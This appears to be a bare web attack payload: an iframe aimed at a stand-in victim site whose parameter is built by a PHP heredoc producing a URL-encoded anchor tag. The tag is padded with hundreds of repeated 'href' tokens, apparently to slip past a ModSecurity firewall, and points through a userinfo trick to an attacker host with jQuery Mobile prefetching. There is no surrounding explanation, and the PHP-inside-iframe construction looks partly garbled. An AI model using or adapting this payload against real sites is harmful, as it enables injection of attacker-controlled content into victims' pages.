<iframe src="http://victim.example.com/repo/waf/modsecurity/jquerymobile.php?inj=<?php
$payload = <<<'PAYLOAD'
<a
/
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href⁀href
/
href=http://victim.example.com::@attacker.example.com/jquerymobile.php data-prefetch=true>
hello?
</a>
PAYLOAD;
echo rawurlencode($payload);
?>"></iframe>


